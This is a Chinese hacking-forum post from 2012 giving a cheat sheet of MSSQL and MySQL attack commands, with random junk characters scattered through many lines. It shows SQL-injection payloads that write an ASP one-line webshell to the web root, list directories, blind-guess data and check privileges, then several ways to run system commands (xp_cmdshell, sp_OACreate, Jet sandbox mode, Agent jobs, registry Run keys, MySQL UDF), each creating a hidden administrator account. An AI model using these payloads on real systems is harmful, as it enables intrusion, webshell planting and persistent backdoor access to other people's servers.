找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2907|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马$ D+ F% r8 |- R. E3 _) C  q
首先确定网站的WEB路径' o4 [# [4 ?/ O4 N; K7 [
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马3 {  r/ v" N% A9 ]4 f

2 Z$ ~* S* F. }* o+ l;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- 9 }( _% y2 V6 v7 t+ q% [2 e
//将一句话木马插入表中4 x" }0 O( G! f2 @- O
  y. {! W$ p, f$ U+ }
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- 9 F, p& d4 Q( k5 i: \
//导出一个ASP文件
7 z4 x) L& C3 \1 L; J, i3 O+ ^: M
% b& O$ e9 _6 X- L% q' n$ m0 \" X1 n2 o7 q4 a
关于MSSQL列目录
9 a/ \8 B% N% ^/ N% T;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表  _5 u  o; U* r  `% `2 d4 p
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
% Z6 u4 b3 K; f' p9 d- q: T# J% B
5 O% H9 z7 r0 I! }* a$ Dand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
. T3 a" c/ N5 n( Y* T5 X- a, A' ~) k
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段( O. ~7 g  i. S$ }# \5 o2 O% g

& L4 w- n9 T" ]  ]; j7 X8 w3 g" ?- D- oAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符% X5 ~: g- Z: _. B5 X: S

# }9 N7 ~5 W( W7 J) r2 K* C
2 z0 m! p: Q5 d; C数据库版本和权限查看3 K1 Z" N% g% T/ n
and 1=(select @@VERSION) //查看详细的数据库信息.0 ^/ |5 T6 s, O% O+ y4 U
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
; N1 ~0 c# k; K4 ^8 A) s; o2 \and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER, b: q. G( a% b# N* t/ ~8 I
" B1 A8 L' c4 E$ [; O
& _" W, ^$ N& a
1.利用xp_cmdshell执行命令" D; E+ ]6 Z/ A
exec master..xp_cmdshell 'net user rfire 123456 /add'
) p4 K0 \; E6 c" L- N( qexec master..xp_cmdshell 'net localgroup administrators rfire /add'
4 f( C) F* U3 W/ W8 `9 E4 ]9 n0 }
6 b5 N& y' t( f4 w, m/ q2 x恢复xp_cmdshell存储过程) \* ^) Y! g' h! P6 e
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
) Q; x, D; H& w$ w7 I5 R3 J1 {! I3 W" v* r3 e9 I4 j* Z
4 ]' l( O5 }  d3 I$ j
2.利用SP_OAcreate和SP_OAMETHOD执行命令
# q# F8 H6 U% y) I$ T$ ~9 p0 Z& s% ]在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
4 E6 q3 {7 X6 c5 z& z; l0 \, FDECLARE @shell INT //建立一个@shell实体
1 k  M$ C! c) ?+ c, W: O0 QEXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例* M7 f7 ^9 n# u& v
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例3 r! W8 d8 F+ ^* `8 N6 n

' G0 F; F4 J# ]: ]) M  u2 L8 ?! @0 `. J
3.利用沙盒模式# k- n, \6 K1 |3 t
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。7 L8 N* i6 J% y9 j5 Q
开启沙盒模式:
: A; Y! g4 B' F7 m, @EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0: j  ^0 ?+ s; p6 ~6 s4 P4 [

& X$ l5 e! X) M执行命令:
1 ]; z1 T& G- H0 oSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
* i( A, b- p2 k/ I( j. y* m" {; _
3 o" z. Z" x  x
9 ^% @8 m* y9 g0 N6 }8 k( q& I4.利用SQL代理执行命令; f3 b1 ?4 F) ?# K0 g4 t; w
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
$ T4 w8 P/ `. n9 Y. V! V. u- m! S. ?. I" }
执行命令:
) I. b; {$ e- R5 duse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错* {! z. G: x& g% a! |1 Q
exec sp_add_job 'x'
" ?4 k+ d  f' y" L7 ~exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业' c8 k1 T9 W3 p% R
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
+ _* @9 k% Q3 S) k. y4 w% `# {0 Y
9 a5 p' N' e. y, @8 [, c2 H" z: w/ `- l+ R8 F8 s# i- t$ m8 T& I
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)) F; t) X" j  H* u5 J) a+ E
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'' z0 n! |: A2 U' o$ o; Q4 [8 Q! _
7 U5 z/ |# G8 x8 W8 M

# r2 l9 e5 a# m6.MYSQL的命令执行' ?" W" i; y( |8 \# t! i
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
3 x  G! ?& C9 E4 a, y. C首先要在su.php下导出c:\windows\udf.dll
0 X& v5 [8 ^* K3 [: t导出后执行创建自定义函数命令:
: f0 h1 _6 R# M! v. U( QCreate Function cmdshell returns string soname 'udf.dll'! q4 U4 G, i1 a- z
执行命令: T0 N2 N" X( N+ K6 l7 H+ T
select cmdshell('net user rfire 123456 /add')# c! Q& M* a4 x9 b; b( ~
执行后删除函数 drop function cmdshell) }/ d: i% K2 }" i* m& w2 V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表